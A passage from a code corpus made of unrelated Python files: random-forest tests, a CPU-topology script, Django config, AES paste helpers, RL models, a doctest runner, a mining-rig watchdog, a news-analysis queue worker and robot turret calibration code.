predicted_depth, parent_mat = smooth_rf.depth_per_node_plus_parent(tree)
c_left = tree.tree_.children_left
c_right = tree.tree_.children_right
left_minus_1 = predicted_depth[c_left != -1] - \
predicted_depth[c_left][c_left != -1]
right_minus_1 = predicted_depth[c_right != -1] - \
predicted_depth[c_right][c_right != -1]
assert np.all([np.all(left_minus_1 == -1), np.all(right_minus_1 == -1)]), \
"parent - children depth != -1 (which it should)"
unique_values = np.array(list(dict(Counter(predicted_depth)).keys()))
unique_values.sort()
assert np.all(unique_values == np.arange(len(unique_values))), \
"jump in depth between at least one parent and child is more than 1"
for c_idx in range(parent_mat.shape[1] - 1):
assert np.all(parent_mat[:,c_idx] - parent_mat[:,c_idx + 1] >= 0), \
"parents should naturally have lower index than children " + \
"(error in parent_mat output)"
assert np.all((parent_mat > 0).sum(axis = 1) == predicted_depth), \
"parent_mat rows should have same number of non-zero entries "+\
"as the depth value"
def test_create_Gamma_eta_forest_more_regression():
"""
test create_Gamma_eta_forest_more, regression forests - standard depth only
compares to what is expected to be returned from create_Gamma_eta_tree -
mostly just structurally
"""
n = 200
n_tree = 10
min_size_leaf = 1
X = np.random.uniform(size = (n, 510), low = -1,high = 1)
y = 10 * np.sin(np.pi * X[:,0]*X[:,1]) + 20 * ( X[:,2] - .5)**2 +\
10 * X[:,3] + 5 * X[:,4] + np.random.normal(size = n)
rf_class = sklearn.ensemble.RandomForestRegressor(n_estimators = n_tree,
min_samples_leaf = min_size_leaf)
random_forest = rf_class.fit(X = X,
y = y.ravel())
g, n, t, ln, ld, li, fd, fi = \
smooth_rf.create_Gamma_eta_forest_more(random_forest)
assert g.shape == n.shape, \
"Gamma and eta matrices are not the correct shared size"
assert g.shape[0] == t.shape[0], \
"the tree index vector doesn't have the correct number of observations"
# new checks
assert t.shape == ln.shape and t.shape == ld.shape and t.shape == li.shape,\
"the leaf number, depth, or impurity don't have the correct dim"
assert g.shape == fd.shape and g.shape == fi.shape, \
"the full depth or impurity doens't have the correct dim"
# ----
assert np.all(
np.array(list(dict(Counter(t)).keys())) == np.arange(n_tree)),\
"tree index doesn't contain expected tree index values"
for t_idx, tree in enumerate(random_forest.estimators_):
max_depth_range = np.int(np.max(smooth_rf.depth_per_node(tree)) + 1)
G_tree, n_tree, ln_tree, ld_tree, li_tree, fd_tree, fi_tree = \
smooth_rf.create_Gamma_eta_tree_more_per(tree)
assert G_tree.shape[0] == np.sum(t == t_idx), \
"shape of single Gamma from create_Gamma_eta_tree" +\
"does not match structure from t_idx output"
assert np.all(G_tree == g[t==t_idx,:][:,:max_depth_range]), \
"doesn't match create_Gamma_eta_tree function for Gamma"
if max_depth_range != g.shape[1]:
assert np.all(g[t==t_idx,][:,max_depth_range:] == 0), \
"extra dimensions, based on the global forest having larger" +\
"depth than the individual tree (num %d) in Gamma are "+\
"non-zero" %t_idx
assert np.all(n_tree == n[t==t_idx,:][:,:max_depth_range]), \
"doesn't match create_Gamma_eta_tree function for eta"
if max_depth_range != g.shape[1]:
assert np.all(n[t==t_idx,][:,max_depth_range:] == 0), \
"extra dimensions, based on the global forest having larger" +\
"depth than the individual tree (num %d) in eta are "+\
"non-zero" %t_idx
# new checks
assert np.all(ln_tree == ln[t==t_idx]), \
"attributes in leaf number should match the base function"
assert np.all(ld_tree == ld[t==t_idx]), \
"attributes in leaf depth should match the base function"
assert np.all(li_tree == li[t==t_idx]), \
"attributes in leaf impurity should match the base function"
assert np.all(ln_tree == ln[t==t_idx]), \
"attributes in leaf number should match the base function"
assert np.all(fd_tree == fd[t==t_idx,:][:,:max_depth_range]), \
"attributes in full depth should match the base function"
assert np.all(fi_tree == fi[t==t_idx,:][:,:max_depth_range]), \
"attributes in full impurity should match the base function"
def test_create_Gamma_eta_forest_more_classification():
"""
test create_Gamma_eta_forestmore, class forests - standard depth only
compares to what is expected to be returned from create_Gamma_eta_tree -
mostly just structurally
"""
n = 200
n_tree = 10
min_size_leaf = 1
X = np.random.uniform(size = (n, 510), low = -1,high = 1)
y = 10 * np.sin(np.pi * X[:,0]*X[:,1]) + 20 * ( X[:,2] - .5)**2 +\
10 * X[:,3] + 5 * X[:,4] + np.random.normal(size = n)
y_cat = np.array(pd.cut(y, bins = 5, labels = np.arange(5, dtype = np.int)),
dtype = np.int)
y = y_cat
num_classes = len(Counter(y_cat).keys())
rf_class = sklearn.ensemble.RandomForestClassifier(n_estimators = n_tree,
min_samples_leaf = min_size_leaf)
random_forest = rf_class.fit(X = X,
y = y.ravel())
g, n, t, ln, ld, li, fd, fi = \
smooth_rf.create_Gamma_eta_forest_more(random_forest)
assert g.shape[1:] == n.shape, \
"Gamma and eta matrices are not the correct shared size"
assert g.shape[1] == t.shape[0], \
"the tree index vector doesn't have the correct number of observations"
assert g.shape[0] == num_classes, \
"Gamma matrix dimensions don't match the number of classes correctly"
# new checks
assert t.shape == ln.shape and t.shape == ld.shape and t.shape == li.shape,\
"the leaf number, depth, or impurity don't have the correct dim"
assert g.shape[1:] == fd.shape and g.shape[1:] == fi.shape, \
"the full depth or impurity doens't have the correct dim"
# ----
assert np.all(
np.array(list(dict(Counter(t)).keys())) == np.arange(n_tree)),\
"tree index doesn't contain expected tree index values"
for t_idx, tree in enumerate(random_forest.estimators_):
max_depth_range = np.int(np.max(smooth_rf.depth_per_node(tree)) + 1)
G_tree, n_tree, ln_tree, ld_tree, li_tree, fd_tree, fi_tree = \
smooth_rf.create_Gamma_eta_tree_more_per(tree)
assert G_tree.shape[1] == np.sum(t == t_idx), \
"shape of single Gamma from create_Gamma_eta_tree" +\
"does not match structure from t_idx output"
assert np.all(G_tree == g[:,t==t_idx,:][:,:,:max_depth_range]), \
"doesn't match create_Gamma_eta_tree function for Gamma"
if max_depth_range != g.shape[1]:
assert np.all(g[:,t==t_idx,][:,:,max_depth_range:] == 0), \
"extra dimensions, based on the global forest having larger" +\
"depth than the individual tree (num %d) in Gamma are "+\
"non-zero" %t_idx
assert np.all(n_tree == n[t==t_idx,:][:,:max_depth_range]), \
"doesn't match create_Gamma_eta_tree function for eta"
if max_depth_range != g.shape[1]:
assert np.all(n[t==t_idx,][:,max_depth_range:] == 0), \
"extra dimensions, based on the global forest having larger" +\
"depth than the individual tree (num %d) in eta are "+\
"non-zero" %t_idx
# new checks
assert np.all(ln_tree == ln[t==t_idx]), \
"attributes in leaf number should match the base function"
assert np.all(ld_tree == ld[t==t_idx]), \
"attributes in leaf depth should match the base function"
assert np.all(li_tree == li[t==t_idx]), \
"attributes in leaf impurity should match the base function"
assert np.all(ln_tree == ln[t==t_idx]), \
"attributes in leaf number should match the base function"
assert np.all(fd_tree == fd[t==t_idx,:][:,:max_depth_range]), \
"attributes in full depth should match the base function"
assert np.all(fi_tree == fi[t==t_idx,:][:,:max_depth_range]), \
"attributes in full impurity should match the base function"
| StarcoderdataPython |
4818965 | <filename>omfgene.py
#!/usr/bin/env python
"""
omfgene.py
Queries Snaptron's discordex for evidence of gene fusions across TCGA. Reports
incidence of fusion at a given evidence level.
"""
| StarcoderdataPython |
75746 | <gh_stars>100-1000
#!/usr/bin/env python
#
# BSD LICENSE
#
# Copyright(c) 2010-2014 Intel Corporation. All rights reserved.
# Copyright(c) 2017 Cavium, Inc. All rights reserved.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Intel Corporation nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import print_function
import sys
try:
xrange # Python 2
except NameError:
xrange = range # Python 3
sockets = []
cores = []
core_map = {}
base_path = "/sys/devices/system/cpu"
fd = open("{}/kernel_max".format(base_path))
max_cpus = int(fd.read())
fd.close()
for cpu in xrange(max_cpus + 1):
try:
fd = open("{}/cpu{}/topology/core_id".format(base_path, cpu))
except IOError:
continue
except:
break
core = int(fd.read())
fd.close()
fd = open("{}/cpu{}/topology/physical_package_id".format(base_path, cpu))
socket = int(fd.read())
fd.close()
if core not in cores:
cores.append(core)
if socket not in sockets:
sockets.append(socket)
key = (socket, core)
if key not in core_map:
core_map[key] = []
core_map[key].append(cpu)
print(format("=" * (47 + len(base_path))))
print("Core and Socket Information (as reported by '{}')".format(base_path))
print("{}\n".format("=" * (47 + len(base_path))))
print("cores = ", cores)
print("sockets = ", sockets)
print("")
max_processor_len = len(str(len(cores) * len(sockets) * 2 - 1))
max_thread_count = len(list(core_map.values())[0])
max_core_map_len = (max_processor_len * max_thread_count) \
+ len(", ") * (max_thread_count - 1) \
+ len('[]') + len('Socket ')
max_core_id_len = len(str(max(cores)))
output = " ".ljust(max_core_id_len + len('Core '))
for s in sockets:
output += " Socket %s" % str(s).ljust(max_core_map_len - len('Socket '))
print(output)
output = " ".ljust(max_core_id_len + len('Core '))
for s in sockets:
output += " --------".ljust(max_core_map_len)
output += " "
print(output)
for c in cores:
output = "Core %s" % str(c).ljust(max_core_id_len)
for s in sockets:
if (s,c) in core_map:
output += " " + str(core_map[(s, c)]).ljust(max_core_map_len)
else:
output += " " * (max_core_map_len + 1)
print(output)
| StarcoderdataPython |
76394 | # Copyright (c) 2021 The Ensaio Developers.
# Distributed under the terms of the BSD 3-Clause License.
# SPDX-License-Identifier: BSD-3-Clause
#
# This code is part of the Fatiando a Terra project (https://www.fatiando.org)
#
# Import functions/classes to make the public API
from ._fetchers import (
fetch_alps_gps,
fetch_britain_magnetic,
fetch_british_columbia_lidar,
fetch_bushveld_gravity,
fetch_caribbean_bathymetry,
fetch_earth_geoid,
fetch_earth_gravity,
fetch_earth_topography,
fetch_osborne_magnetic,
fetch_sierra_negra_topography,
fetch_southern_africa_gravity,
fetch_southern_africa_topography,
locate,
)
from ._version import __version__
| StarcoderdataPython |
3388600 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-03-18 15:46
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('variableServer', '0003_auto_20180710_1657'),
]
operations = [
migrations.AlterField(
model_name='variable',
name='value',
field=models.CharField(blank=True, max_length=300),
),
]
| StarcoderdataPython |
4819094 | <reponame>NyanKiyoshi/CryptoPaste<filename>cryptopaste/utils.py<gh_stars>1-10
# -*- coding: utf-8 -*-
# ==== CryptoPaste
# AUTHOR: NyanKiyoshi
# COPYRIGHT: 2015 - NyanKiyoshi
# URL: https://github.com/NyanKiyoshi/CryptoPaste/
# LICENSE: https://github.com/NyanKiyoshi/CryptoPaste/master/LICENSE
#
# This file is part of CryptoPaste under the MIT license. Please take awareness about this latest before doing anything!
from random import choice, randrange
import hashlib
import base64
from Crypto import Random
from Crypto.Cipher import AES
def new_key(
length=128, min_length=None, max_length=None,
begin='', end='', chars='<KEY>'
):
if ((min_length or max_length) and length) or (min_length and max_length):
length = randrange(min_length, max_length or length)
return begin + ''.join([choice(chars) for i in range(length)]) + end
class AESCipher:
def __init__(self, key):
self.bs = 256
self.key = hashlib.sha256(key.encode()).digest()
def encrypt(self, raw):
iv = Random.new().read(AES.block_size)
return base64.b64encode(iv + AES.new(self.key, AES.MODE_CBC, iv).encrypt(self._pad(raw)))
def decrypt(self, enc):
enc = base64.b64decode(enc)
return self._un_pad(
AES.new(self.key, AES.MODE_CBC, enc[:AES.block_size]).decrypt(enc[AES.block_size:])
).decode('utf-8')
def _pad(self, s):
return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)
@staticmethod
def _un_pad(s):
return s[:-ord(s[len(s)-1:])]
def flash_response(request, message, level=0, html=False):
html = 'html' if html else 'plain'
if level == 2:
request.session.flash(('info', message, html))
elif level == 1:
request.session.flash(('warn', message, html))
else:
request.session.flash(('error', message, html))
def td_to_str(td_obj):
"""
Convert a timedelta object to allow a "string" usage. In reality, it return a `dict`.
:param td_obj:
:return: {years: x, months: x, days: x, hours: x, minutes: x, seconds: x}
"""
td_obj = int(td_obj.total_seconds())
# 1 year = 31,540,000s
# 1 month = 2,628,000s
# 1 week = 604,800s
# 1 day = 86,400s
# 1 hour = 60s
r = {}
for i in [
{
'str': 'years',
'value': 31540000,
},
{
'str': 'months',
'value': 2628000,
},
{
'str': 'days',
'value': 86400,
},
{
'str': 'hours',
'value': 3600,
},
{
'str': 'minutes',
'value': 60,
},
]:
r[i['str']] = td_obj / i['value']
td_obj -= r[i['str']] * i['value']
r['seconds'] = td_obj
return r
| StarcoderdataPython |
1773041 | import gym
import sonnet as snt
import tensorflow as tf
import numpy as np
from ray.rllib.models.tf.tf_modelv2 import TFModelV2
def build_logits(action_space, latent_vec):
if isinstance(action_space, gym.spaces.Discrete):
return snt.Linear(output_size=action_space.n,
initializers={'w': tf.initializers.orthogonal(np.sqrt(0.01))})(latent_vec)
elif isinstance(action_space, gym.spaces.MultiDiscrete):
return tf.concat([build_logits(gym.spaces.Discrete(n), latent_vec) for n in action_space.nvec], axis=1)
elif isinstance(action_space, gym.spaces.Box):
assert len(action_space.shape) == 1
mean = snt.Linear(output_size=action_space.shape[0],
initializers={'w': tf.initializers.orthogonal(np.sqrt(0.01))})(latent_vec)
log_std = tf.get_variable(name='log_std', shape=[1, action_space.shape[0]], initializer=tf.zeros_initializer())
return tf.concat([mean, mean * 0.0 + log_std], axis=1)
elif isinstance(action_space, gym.spaces.Tuple):
return tf.concat([build_logits(space, latent_vec) for space in action_space.spaces], axis=1)
else:
raise NotImplementedError(f"Action space of type {type(action_space)} is not supported.")
class NatureModel(snt.AbstractModule):
def __init__(self, action_space, _sentinel=None, custom_getter=None, name=None):
super().__init__(_sentinel, custom_getter, name)
self.action_space = action_space
def _build(self, spatial_obs, non_spatial_obs=None, *unused_args, **unused_kwargs):
conv_out = snt.Conv2D(output_channels=32, kernel_shape=8, stride=4,
initializers={'w': tf.initializers.orthogonal(np.sqrt(2))})(spatial_obs)
conv_out = tf.nn.relu(conv_out)
conv_out = snt.Conv2D(output_channels=64, kernel_shape=4, stride=2,
initializers={'w': tf.initializers.orthogonal(np.sqrt(2))})(conv_out)
conv_out = tf.nn.relu(conv_out)
conv_out = snt.Conv2D(output_channels=64, kernel_shape=3, stride=1,
initializers={'w': tf.initializers.orthogonal(np.sqrt(2))})(conv_out)
conv_out = tf.nn.relu(conv_out)
conv_out = snt.BatchFlatten()(conv_out)
conv_out = snt.Linear(output_size=512, initializers={'w': tf.initializers.orthogonal(np.sqrt(2))})(conv_out)
conv_out = tf.nn.relu(conv_out)
if non_spatial_obs is not None:
conv_out = tf.concat([conv_out, non_spatial_obs], axis=-1)
logits = build_logits(action_space=self.action_space, latent_vec=conv_out)
baseline = snt.Linear(output_size=1,
initializers={'w': tf.initializers.orthogonal(np.sqrt(0.01))})(conv_out)
return logits, baseline
class DoomNatureModel(TFModelV2):
def __init__(self, obs_space, action_space, num_outputs, model_config, name):
super().__init__(obs_space, action_space, num_outputs, model_config, name)
self.model = NatureModel(action_space)
def forward(self, input_dict, state, seq_lens):
obs, prev_actions = input_dict['obs'], input_dict["prev_actions"]
if isinstance(obs, tuple) or isinstance(obs, list):
logits, baseline = self.model(obs[0], non_spatial_obs=obs[1])
else:
logits, baseline = self.model(obs)
self.baseline = tf.reshape(baseline, [-1])
return logits, state
def variables(self, as_dict=False):
if not self.model.is_connected:
var_list = []
else:
var_list = self.model.variables
if as_dict:
return {v.name: v for v in var_list}
return var_list
def value_function(self):
return self.baseline
| StarcoderdataPython |
1619717 | #!/usr/bin/python
# testdoc.py [-d] [-r] file
import sys
import os, os.path
import doctest
import warnings
from doctest_tools import setpath
debug = False
warnings.simplefilter('default')
def import_module(modulepath, remove_first_path = False, full = True):
r"""Imports the module indicated by modulepath.
Also adds the proper containing directories to Python's sys.path.
Returns the imported module.
"""
pythonpath = \
setpath.setpath(modulepath, remove_first=remove_first_path, full=full)
if debug:
sys.stderr.write("setpath added: %s\n" % (pythonpath,))
modulepath = modulepath[len(pythonpath[0]) + 1:]
if debug:
sys.stderr.write("modulepath: %s\n" % (modulepath,))
modulename = modulepath.replace('/', '.').replace(os.path.sep, '.')
if debug:
sys.stderr.write("modulename: %s\n" % (modulename,))
module = __import__(modulename)
for comp in modulename.split('.')[1:]:
module = getattr(module, comp)
return module
def test(path, remove_first_path = False, full = True):
r"""Runs doctest on the file indicated by 'path'.
This will run testmod if the file ends in .py, .pyc or .pyo; and testfile
for all other files.
When running testfile on python 2.5, it enables Python's "with" statement
(as if the file being tested had done "from __future__ import
with_statement"). This is done because doing the __future__ import does
not work in files. :-(
Also when running testfile, the current working directory is first set to
the directory containing the file. This is not done for python modules
(.py, .pyc or .pyo files).
In all cases, all non-package directories containing package directories
(i.e., directories containing an __init__.{py,pyc,pyo} file) are added to
sys.path. The search is started in the directory containing the file. If
the bottom-most directory is not a package directory, it is added to the
path too.
"""
path = os.path.normpath(path)
fullpath = os.path.abspath(path)
if path.endswith('.py'):
module = import_module(fullpath[:-3], remove_first_path, full)
elif path.endswith(('.pyc', '.pyo')):
module = import_module(fullpath[:-4], remove_first_path, full)
else:
new_paths = \
setpath.setpath(fullpath, remove_first=remove_first_path, full=full)
if debug:
sys.stderr.write("setpath added: %s\n" % (new_paths,))
os.chdir(os.path.dirname(fullpath))
if sys.version_info[:2] == (2, 5):
import __future__
return doctest.testfile(fullpath, False,
globs={
'with_statement':
__future__.with_statement,
})
else:
return doctest.testfile(fullpath, False)
module.doing_doctest = True
return doctest.testmod(module)
def usage():
sys.stderr.write("usage: %s [-d] [-r] file\n"
" if -d is specified, debug output is turned on\n"
" if -r is specified, the number of errors "
"and tests is printed to stderr\n"
% os.path.basename(sys.argv[0]))
sys.exit(2)
def run_command(remove_first_path = False):
r"""Process the command line args and call test().
If the '-r' option is given, the number of errors and tests is printed to
stdout separated by a space.
Returns an exit status of 1 if any errors are reported.
"""
global debug
print_numbers = False
command_args = sys.argv[1:]
if not command_args:
usage()
if command_args[0] in ('-h', '--help'):
usage()
if command_args[0] == '-d':
if len(command_args) < 2:
usage()
debug = True
del command_args[0]
if command_args[0] == '-r':
if len(command_args) < 2:
usage()
print_numbers = True
del command_args[0]
if len(command_args) != 1:
usage()
filename = command_args[0]
try:
errors, tests = test(filename, remove_first_path)
except IOError:
sys.stdout.write("%s: file not found\n\n" % filename)
usage()
except ImportError:
sys.stdout.write("%s: module not found\n\n" % filename)
usage()
if print_numbers:
sys.stdout.write("TESTDOC RESULTS: Errors %d, Tests %d\n" %
(errors, tests))
if errors: sys.exit(1)
if __name__ == "__main__":
run_command()
| StarcoderdataPython |
1759697 | #import matplotlib.pyplot as plt
def append_history(history, h):
'''
This function appends the statistics over epochs
'''
try:
history.history['loss'] = history.history['loss'] + h.history['loss']
history.history['val_loss'] = history.history['val_loss'] + h.history['val_loss']
history.history['acc'] = history.history['acc'] + h.history['acc']
history.history['val_acc'] = history.history['val_acc'] + h.history['val_acc']
except:
history = h
return history
def unfreeze_layer_onwards(model, layer_name):
'''
This layer unfreezes all layers beyond layer_name
'''
trainable = False
for layer in model.layers:
try:
if layer.name == layer_name:
trainable = True
layer.trainable = trainable
except:
continue
return model
#def plot_performance(history):
# '''
# This function plots the train & test accuracy, loss plots
# '''
#
# plt.subplot(1,2,1)
# plt.plot(history.history['acc'])
# plt.plot(history.history['val_acc'])
# plt.title('Accuracy v/s Epochs')
# plt.ylabel('Accuracy')
# plt.xlabel('Epoch')
# plt.legend(['train', 'test'], loc='upper left')
#
# plt.subplot(1,2,2)
# plt.plot(history.history['loss'])
# plt.plot(history.history['val_loss'])
# plt.title('Loss v/s Epochs')
# plt.ylabel('M.S.E Loss')
# plt.xlabel('Epoch')
# plt.legend(['train', 'test'], loc='upper left')
#
# plt.tight_layout()
# plt.show()
| StarcoderdataPython |
1723519 | <reponame>malja/check_miner<filename>check_miner.py
import requests
import psutil
import dns.resolver
import smtplib
from threading import Timer
import subprocess
from datetime import datetime
PROCESS_NAME = "EthDcrMiner64.exe"
MINER_ADDRESS = ""
PATH_TO_EXECUTABLE = ""
INTERVAL = 60*60
EMAIL_FROM = ""
EMAIL_TO = ""
EMAIL_SUBJECT = "Miner Watch"
EMAIL_MESSAGE = "Miner prestal tezit a byl restartovan."
class RepeatedTimer(object):
def __init__(self, interval, function, *args, **kwargs):
self._timer = None
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.is_running = False
self.start()
def _run(self):
self.is_running = False
self.start()
self.function(*self.args, **self.kwargs)
def start(self):
if not self.is_running:
self._timer = Timer(self.interval, self._run)
self._timer.start()
self.is_running = True
def stop(self):
self._timer.cancel()
self.is_running = False
def send_rest_request( miner_address ):
print("Getting response from server...")
api_address = "https://api.ethermine.org/miner/" + miner_address + "/currentStats"
response = requests.get( api_address )
json_data = None
try:
json_data = response.json()
except ValueError as e:
print("Connection error...")
if ( json_data == None ):
return False
elif ( json_data["status"] == "OK" and len( json_data["data"] ) != 0 ):
return json_data["data"]
else:
return False
def find_process_and_kill( process_name ):
print("Searching for specified process to be killed...")
for proc in psutil.process_iter():
if proc.name() == process_name:
print("Process found ...")
proc.kill()
return True
return False
def start_new_process( path ):
subprocess.Popen( [ path ] )
def resolve_server_address( server ):
answers = dns.resolver.query(server, 'MX')
if len(answers) <= 0:
return False
return str(answers[0].exchange)
def send_email( address_to, address_from, subject, message ):
server = ""
try:
server = resolve_server_address( address_to[address_to.find("@")+1:] )
except dns.resolver.NXDOMAIN:
return False
mailer = smtplib.SMTP(host=server)
message = "From: {}\nTo: {}\nSubject:{}\n{}".format( address_from, address_to, subject, message)
try:
mailer.sendmail(address_from, address_to, message)
except smtplib.SMTPException as e:
return False
return True
def run():
print("Checking response from API server...")
response = send_rest_request( MINER_ADDRESS )
if ( response == False ):
print( datetime.now().strftime("%Y-%m-%d %H:%M:%S") + " Worker is not mining...")
find_process_and_kill( PROCESS_NAME )
start_new_process( PATH_TO_EXECUTABLE )
send_email( EMAIL_TO, EMAIL_FROM, EMAIL_SUBJECT, EMAIL_MESSAGE )
else:
print(datetime.now().strftime("%Y-%m-%d %H:%M:%S") + " Everything is fine...")
###############################################################################
## CODE ITSELF
###############################################################################
print("Starting...")
rt = RepeatedTimer( INTERVAL , run )
try:
while True:
user_input = input()
if ( user_input == "q" or user_input == "exit" or user_input == "quit" ):
print("Quiting")
rt.stop()
break
finally:
rt.stop()
| StarcoderdataPython |
194853 | # -*- coding: utf-8 -*-
import django
from django.conf.urls import include, url
from django.contrib import admin
from django.conf import settings
from django.http import HttpResponse
import django.views.static
import example.testapp.views
admin.autodiscover()
def handle404(request):
return HttpResponse('404')
def handle500(request):
return HttpResponse('404')
handler404 = 'example.urls.handle404'
handler500 = 'example.urls.handle500'
if django.VERSION < (1, 9):
urlpatterns = [url(r'^admin/', include(admin.site.urls), name="admin")]
else:
urlpatterns = [url(r'^admin/', admin.site.urls, name="admin")]
urlpatterns += [
url(r'^media/(.*)$', django.views.static.serve, {'document_root': settings.MEDIA_ROOT}),
url(r'^parkingarea/(?P<pk>\d+)/$', example.testapp.views.parkingarea_update, name='parkingarea'),
url(r'^', include('django.contrib.staticfiles.urls')),
]
| StarcoderdataPython |
51776 | #!/usr/bin/env python3
import os
import sys
import json
import configparser
import logging
import logging.config
import traceback
# install required package if in docker
if os.geteuid() == 0:
import pkgutil
import subprocess
required_pkgs = ["pytz"]
for pkg in required_pkgs:
if not pkgutil.find_loader(pkg):
p = subprocess.Popen(["pip3","install", pkg], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.wait()
import helper
import handler_basic
import handler_byline
import handler_lab
import handler_score
APP_VERSION = 4
if "WORKER_ID" in os.environ:
WORKER_ID = os.environ["WORKER_ID"]
else:
raise SystemExit("Environment variable 'WORKER_ID' is not found.")
if WORKER_ID == "dev":
logging.config.fileConfig('logging.conf')
helper.eventlog.enable_local_echo()
logger = logging.getLogger("basic")
helper.mongo.connect()
def update_self_then_restart():
helper.mongo.close()
if WORKER_ID == "dev":
raise SystemExit("NoUpdate if dev")
#script_path = os.path.join(os.path.dirname(os.path.realpath(sys.argv[0])), "gitpull_then_restart.sh")
#subprocess.Popen([script_path])
#raise SystemExit("Exit for self-update")
# return code 99 will execute "git pull"
print("Exit for update and restart")
sys.exit(99)
def get_safe_param(jobj,pname):
if pname in jobj:
return jobj[pname]
else:
return None
def on_notice(raw_body):
#print("Got notice", raw_body)
try:
task_spec = json.loads(raw_body.decode("utf-8"))
cmd = task_spec["cmd"]
except:
logger.error("Invalid notice json: %r", raw_body)
return
if cmd == "exit":
logger.info("Got exit command from RabbitMQ channel")
helper.rabbit.stop()
elif cmd == "update":
update_self_then_restart()
elif cmd == "ping":
logger.info("Got ping command: " + get_safe_param(task_spec, "param"))
helper.eventlog.info("PONG " + get_safe_param(task_spec, "param"))
else:
logger.error("Unknown notice cmd: %s", cmd)
def on_task(raw_body):
#print("Got task", raw_body)
try:
task_spec = json.loads(raw_body.decode("utf-8"))
cmd = task_spec["cmd"]
ver = int(task_spec["ver"])
except:
logger.error("Invalid task json: %r", raw_body)
return
try:
if cmd == "basic":
handler_basic.process_basic_measurements(ver, task_spec)
elif cmd == "score":
handler_score.process_score_all(ver, task_spec)
elif cmd == "byline":
handler_byline.process_byline_extract(ver, task_spec) # 이제 안씀
elif cmd == "lab_split":
handler_lab.process_split(ver, task_spec)
elif cmd == "lab_postag":
handler_lab.process_postag(ver, task_spec)
elif cmd == "lab_sanitize":
handler_lab.process_sanitize(ver, task_spec)
elif cmd == "lab_metric":
handler_lab.process_metric(ver, task_spec)
elif cmd == "lab_trust":
handler_lab.process_trust(ver, task_spec)
elif cmd == "lab_integrate":
handler_lab.process_integrate(ver, task_spec)
else:
logger.error("Unknown task cmd: %s", cmd)
helper.eventlog.error("Unknown task cmd: %s" % cmd)
except Exception as ex:
newsId = task_spec["newsId"] if "newsId" in task_spec else "NoNews"
#ex_type, ex_value, ex_traceback = sys.exc_info()
#print("에러(%s,%s): %s,%s" % (cmd, newsId, ex_value.filename, ex_value.strerror))
helper.eventlog.fatal("에러(%s,%s): %s" % (cmd, newsId, str(ex)))
helper.eventlog.set_worker_id(WORKER_ID)
if WORKER_ID != "dev":
helper.eventlog.trace("Worker %s started (%d)" % (WORKER_ID, APP_VERSION))
logger.debug("Worker [%s] started (%d, %s)", WORKER_ID, APP_VERSION, os.environ["MQ_URL"])
# if __name__ == '__main__':
# handler_basic.process_basic_measurements(1, {"newsId":"02100101.20160630120514682"})
# handler_score.process_score_all(1, {"newsId":"02100101.20160630120514682"})
# on_task({"cmd":"basic", "ver":"1", "newsId":"01101001.20160601133622578"})
# 변경한 가중치 적용 -> 기사평가(asStats)
# coll_stat = helper.mongo.get_collection("asStats")
# docs = coll_stat.find({})
# for doc in docs:
# handler_score.process_score_all(1, {"newsId":doc["news_id"]})
# #print(doc["news_id"], doc["title"])
# 변경한 가중치 적용 -> 처리기사(news)
# coll_news = helper.mongo.get_collection("news")
# docs = coll_news.find({})
# for doc in docs:
# handler_basic.process_basic_measurements(1, {"newsId":doc["newsId"]})
# print(doc["newsId"], doc["title"])
try:
helper.rabbit.set_notice_handler(on_notice)
helper.rabbit.set_task_handler(on_task)
helper.rabbit.run(os.environ["MQ_URL"])
except KeyboardInterrupt:
helper.rabbit.stop()
logger.debug("Worker [%s] stopped.", WORKER_ID)
| StarcoderdataPython |
111175 | <filename>components/Actuators/HighLevel/turretCalibrate.py
from magicbot import StateMachine, feedback, state
from rev import SparkMaxLimitSwitch
from components.Actuators.LowLevel.turretThreshold import TurretThreshold
from networktables import NetworkTables as networktable
class CalibrateTurret(StateMachine):
compatString = ["teapot"]
turretThreshold: TurretThreshold
limitTable = networktable.getTable("SmartDashboard")
offset = 206
limitL = None
limitR = None
useMotor = False
def setup(self):
turretMotor = self.turretThreshold.turretMotor
self.forwardLimitSwitch = turretMotor.getForwardLimitSwitch(SparkMaxLimitSwitch.Type.kNormallyOpen)
self.reverseLimitSwitch = turretMotor.getReverseLimitSwitch(SparkMaxLimitSwitch.Type.kNormallyOpen)
def setUseMotor(self, motor:bool):
"""
Determines whether we use motor or not during calibration.
"""
self.useMotor = motor
@feedback
def getLeftClicked(self):
return self.reverseLimitSwitch.get()
@feedback
def getRightClicked(self):
return self.forwardLimitSwitch.get()
@state(first = True)
def findRightdeadzone(self):
if self.getRightClicked():
self.limitR = self.turretThreshold.getPosition()
self.limitL = self.limitR - self.offset
self.foundDeadzones()
else:
if self.useMotor:
self.turretThreshold.setTurretspeed(self.turretThreshold.calibSpeed)
self.turretThreshold.setCalibrating(True)
self.next_state("findRightdeadzone")
def foundDeadzones(self):
